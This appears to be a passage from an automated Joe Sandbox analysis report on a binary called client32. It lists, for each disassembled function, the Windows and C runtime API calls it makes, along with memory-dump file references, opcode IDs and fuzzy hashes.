                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: psapi.dll
                                                                                                                        • API String ID: 1029625771-80456845
                                                                                                                        • Opcode ID: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
                                                                                                                        • Instruction ID: e7d689bb3e0256121f65424e75b73c3f9b38c7483ec2d975ead7d22227fa1e2d
                                                                                                                        • Opcode Fuzzy Hash: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
                                                                                                                        • Instruction Fuzzy Hash: 7DE009B1A01B118FC3B0CF3A9544646BAF0BB186103118A3ED0AEC3A00E330A5448F90
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101516E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: nslsp.dll
                                                                                                                        • API String ID: 1029625771-3933918195
                                                                                                                        • Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                        • Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
                                                                                                                        • Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                        • Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 11073ECF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073F39
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1654520187-0
                                                                                                                        • Opcode ID: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                        • Instruction ID: a025be61f5cc20f5ad5b88b5485e82962b2b8b991e0ff8e486065cca72918f8b
                                                                                                                        • Opcode Fuzzy Hash: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                        • Instruction Fuzzy Hash: 8A21B076E00228A7DB10DE59EC45BEFFBB8FB44314F0041AAF9099B240E7759A54CBE1
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 1108752F
                                                                                                                        • InitializeCriticalSection.KERNEL32(?,?,1117CF74,?), ref: 110875A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalInitializeSection_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 453477542-0
                                                                                                                        • Opcode ID: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
                                                                                                                        • Instruction ID: 75295544d9195e04375e6fd21bc40551df4152833ee3a01bc0b81666db33725f
                                                                                                                        • Opcode Fuzzy Hash: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
                                                                                                                        • Instruction Fuzzy Hash: 711157B0902B148FC3A4CF7A89816C6FAE5BB48315F90892E96EEC2200DB716564CF91
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11140AD1
                                                                                                                        • ExtractIconExA.SHELL32(?,00000000,00090407,00140363,00000001), ref: 11140B08
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExtractFileIconModuleName
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3911389742-0
                                                                                                                        • Opcode ID: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
                                                                                                                        • Instruction ID: fbd1f7f6eca67a3d4699d4d052ae62d0c626dfd316a41b503206f924cf5b890f
                                                                                                                        • Opcode Fuzzy Hash: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
                                                                                                                        • Instruction Fuzzy Hash: EFF02478A4511C9FEB48CFE4CC86FBDF769E784708F808269EE12871C4CE7029488740
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF
                                                                                                                        • __lock_file.LIBCMT ref: 1116057C
                                                                                                                        • __fclose_nolock.LIBCMT ref: 11160587
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock_file
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2959217138-0
                                                                                                                        • Opcode ID: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
                                                                                                                        • Instruction ID: c99a5f40794e7bd6d5a1a4a2a70ed171e4b9561b0896b3e5cf790a4aaee0ba1f
                                                                                                                        • Opcode Fuzzy Hash: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
                                                                                                                        • Instruction Fuzzy Hash: A7F09035D11B179AD710AB7598047AEFBB86F0133CF118208C4649A1D0CBFEAA21DB96
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A6C26
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 685A6C5B
                                                                                                                          • Part of subcall function 685A6940: GetTickCount.KERNEL32 ref: 685A6950
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4250438611-0
                                                                                                                        • Opcode ID: 3ffbe2ba07ed7edafacd5dee2bb539a8235f082dc1d35ef028f6fdfd2a9b8d15
                                                                                                                        • Instruction ID: 661e61dc1211ccd4f13e12e72c8a70072f1f8168924ab5dea67af204b1cc2986
                                                                                                                        • Opcode Fuzzy Hash: 3ffbe2ba07ed7edafacd5dee2bb539a8235f082dc1d35ef028f6fdfd2a9b8d15
                                                                                                                        • Instruction Fuzzy Hash: 77F05431640304CECF14EB7889983ACB6E1EB92315F92012ADA229A680E774CC80C746
                                                                                                                        APIs
                                                                                                                        • WSACancelBlockingCall.WSOCK32 ref: 685963A9
                                                                                                                        • Sleep.KERNEL32(00000032), ref: 685963B3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockingCallCancelSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3706969569-0
                                                                                                                        • Opcode ID: cf3026702103ff340213a672aac302d0c12d1cbce9ad8d3bb249a37ebd04398e
                                                                                                                        • Instruction ID: 9c7c155be69afa6d0bd9e6666db90ee95b709ffd67e9b265f4dba9f265acbfe9
                                                                                                                        • Opcode Fuzzy Hash: cf3026702103ff340213a672aac302d0c12d1cbce9ad8d3bb249a37ebd04398e
                                                                                                                        • Instruction Fuzzy Hash: 80B092782A22A069AF40137109062BA20C80FD5287FE104602B59CA085EF20C504A5A1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457
                                                                                                                          • Part of subcall function 1116076B: __fsopen.LIBCMT ref: 11160778
                                                                                                                        • GetLastError.KERNEL32(?,0224B858,000000FF,?), ref: 11141545
                                                                                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0224B858,000000FF,?), ref: 11141555
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3768737497-0
                                                                                                                        • Opcode ID: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
                                                                                                                        • Instruction ID: 7e8c35b226adcaf9db255fe0cc88c7d1a69018d15e21d4c5589b92f150ef4e8a
                                                                                                                        • Opcode Fuzzy Hash: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
                                                                                                                        • Instruction Fuzzy Hash: 19114876F00615ABDB119F90CDC0AAEF778EF46A19F244164EC06DB200E734BE518BE2
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010A34
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3382485803-0
                                                                                                                        • Opcode ID: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
                                                                                                                        • Instruction ID: a25f3913c8117ba577326b804e25134151bce6e6eea091deb2a1df2ca1a14b49
                                                                                                                        • Opcode Fuzzy Hash: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
                                                                                                                        • Instruction Fuzzy Hash: 7F516D75A00645DFDB04CF98C980AADBBF6FF89318F24829DD5459B389C776E902CB90
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: 5fa8f17be554a0f05a8c027d360aa03ad4c45c20bf0e8ea4a2cc0b0f6e1ef9b5
                                                                                                                        • Instruction ID: 39b51422fadbad7160f5098cdb9dd12f31e08204b6f2b6def03bbff7de3af923
                                                                                                                        • Opcode Fuzzy Hash: 5fa8f17be554a0f05a8c027d360aa03ad4c45c20bf0e8ea4a2cc0b0f6e1ef9b5
                                                                                                                        • Instruction Fuzzy Hash: 8F214F75D00269EFEB40CE69C98059D7BF5EF45364F1081AAEC29EB241D774DE508B90
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
